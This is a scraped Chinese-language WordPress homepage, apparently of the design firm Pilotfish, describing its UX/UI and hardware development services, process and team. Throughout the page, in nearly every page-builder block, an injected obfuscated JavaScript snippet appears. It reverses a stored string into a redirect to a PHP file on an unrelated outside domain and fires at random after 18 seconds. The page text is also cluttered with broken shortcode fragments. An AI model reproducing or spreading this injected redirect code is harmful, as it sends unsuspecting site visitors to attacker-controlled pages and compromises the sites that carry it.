)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” fade_text=”#E-8_JTNDaDElMjBzdHlsZSUzRCUyMnRleHQtYWxpZ24lM0ElMjBjZW50ZXIlM0Jjb2xvciUzQSUyMCUyM2YyZjJmMiUzQiUyMiUyMiUzRSUyQVNoYXBpbmclMjB0aGUlMjBGdXR1cmUlMkElM0MlMkZoMSUzRQ==” extra_class=”” thb_video_bg=”https://www.pilotfish.digital/wp-content/uploads/2020/04/website_Digital_banner-video_V5_1280_compressed.mp4″ css=”.vc_custom_1586424347361{padding-top: 35vh !important;padding-bottom: 35vh !important;}”]

專注人性化科技

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1536155973892{padding-top: 0px !important;padding-bottom: 10px !important;background-color: #f2f2f2 !important;}”]
0
跨國服務據點
0
設計開發年資
0
物聯網專案
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1544114437174{padding-top: 5vh !important;padding-bottom: 5vh !important;}” el_class=”align-center”]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom-to-top” css=”.vc_custom_1585537933089{padding-right: 10% !important;padding-left: 10% !important;}”]

形 塑 未 來

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom-to-top” css=”.vc_custom_1585482031950{padding-right: 10% !important;padding-left: 10% !important;}”]

Pilotfish 以新創公司特有的創造性思維,結合豐富的數位科技與工業設計專案開發經驗,協助客戶開發各項B2C和B2B導向之跨領域數位產品專案。我們擅長以最務實的使用者體驗設計,詮釋複雜的尖端科技,創作出足以驚艷市場的作品。

 

正在尋找硬體開發合作夥伴嗎?
請瀏覽 從概念到量產 讓我們幫你找到合適方案

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1544114269104{padding-top: 5vh !important;padding-bottom: 5vh !important;background-color: #f2f2f2 !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}” el_class=”align-center”]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom-to-top” css=”.vc_custom_1585539309288{padding-right: 10% !important;padding-left: 10% !important;}”]

開 發 流 程
使用者研究

我們鑽研企業客戶的產業環境與專業能力,力求達標相等的知識水平,我們的目標是能夠釐清客戶需求脈絡,了解其痛點,分析所處的市場與競爭環境,並清晰掌握最終用戶需求。

介面設計 & 概念原型

切實分析用戶需求之後,由我們的設計師將悉心彙整的使用者洞見,轉譯成更明確的設計概念及架構圖稿,賦予其形體和質感。我們在設計、概念原型及測試階段當中,不斷徵詢使用者的真實意見回饋,藉以優化產品使用體驗。

導入執行

經過嚴謹的設計階段之後,最後再由我們優秀的程式開發工程師接手,轉化設計構念,具體實作出後端功能、前端介面、及所有的微互動創意,成為兼具易用性及實用功能性的互動體驗設計。

[thb_button size=”small” animation=”animation bottom-to-top” icon=”” link=”url:https%3A%2F%2Fwww.pilotfish.digital%2Fzh%2F%E6%9C%8D%E5%8B%99%E9%A0%85%E7%9B%AE%2F%20|title:%E6%9C%8D%E5%8B%99%E9%A0%85%E7%9B%AE||”]
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1544114277388{padding-top: 5vh !important;}”]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top-to-bottom”]

精 選 案 例

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom”]
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1544114269104{padding-top: 5vh !important;padding-bottom: 5vh !important;background-color: #f2f2f2 !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}” el_class=”align-center”]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom-to-top” css=”.vc_custom_1585484314615{padding-right: 10% !important;padding-left: 10% !important;}”]

屹立業界的核心能力
20年深厚開發資歷,專注於科技產品設計開發產業
UI / UX 設計、軟硬體開發到批量生產,一站式服務
加速從企劃到上市的專案時程,同時為您減少不必要的開發風險
[thb_button size=”small” animation=”animation bottom-to-top” icon=”” link=”url:https%3A%2F%2Fwww.pilotfish.digital%2Fzh%2F%E6%9C%8D%E5%8B%99%E9%A0%85%E7%9B%AE%2F%20|title:%E6%9C%8D%E5%8B%99%E9%A0%85%E7%9B%AE||”]
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1544114892231{padding-top: 5vh !important;padding-bottom: 1vh !important;}” el_class=”align-center”]
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1474963318991{padding-right: 10% !important;padding-left: 10% !important;}” offset=”vc_col-lg-8 vc_col-md-9″]
核 心 團 隊

我們熱衷於實踐夢想

您的數位開發團隊

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1544115042141{padding-bottom: 4vh !important;}”]
Jean Lin

UX 設計師

Ingram Huang

數位部總監

Harm Hogenbirk

經營董事

Rita Huang

UI 設計師

Jacky Lu

UI 設計總監

Cheng Yang

資深 UI 設計師

Money Chien

資深 UI 設計師

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1544115025185{padding-top: 0px !important;padding-bottom: 6vh !important;background-color: #ffffff !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}” el_class=”align-center”]
[thb_button size=”small” animation=”animation bottom-to-top” icon=”” link=”url:https%3A%2F%2Fwww.pilotfish.digital%2Fzh%2F%E9%97%9C%E6%96%BC%E6%88%91%E5%80%91%2F%20|title:%E9%97%9C%E6%96%BC%E6%88%91%E5%80%91||”]
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1573696445840{padding-top: 20vh !important;padding-bottom: 15vh !important;background: rgba(255,255,255,0.48) url(https://www.pilotfish.digital/wp-content/uploads/2019/11/We-Love-Challenge_background-pictures.jpg?id=2431) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;*background-color: rgb(255,255,255) !important;}” el_class=”align-center”]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1587013659445{padding-top: 3% !important;padding-right: 15% !important;padding-bottom: 5% !important;padding-left: 15% !important;background-color: #fcfcfc !important;}”]

我們熱愛挑戰!

您是否正在為了手上的數位產品專案苦惱著,究竟要如何為產品設計出優異且獨特的使用體驗設計,要如何越過摸不著頭緒的的科技障礙? 歡迎聯繫我們的團隊,讓我們協助您破解所有的技術難題。

[thb_button color=”accent” size=”small” animation=”animation bottom-to-top” icon=”” link=”url:mailto%3Ainfo.taiwan%40pilotfish.eu|title:%E7%AB%8B%E5%8D%B3%E8%81%AF%E7%B5%A1|target:_blank”]
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom”]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom-to-top” css=”.vc_custom_1585539339638{padding-right: 10% !important;padding-left: 10% !important;}”]

企 業 客 戶
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1536159460556{border-right-width: 80px !important;border-left-width: 80px !important;padding-right: 40px !important;padding-left: 40px !important;}”]
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1536159451706{border-left-width: 0px !important;padding-right: 0px !important;border-left-color: #ffffff !important;}”]
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom”]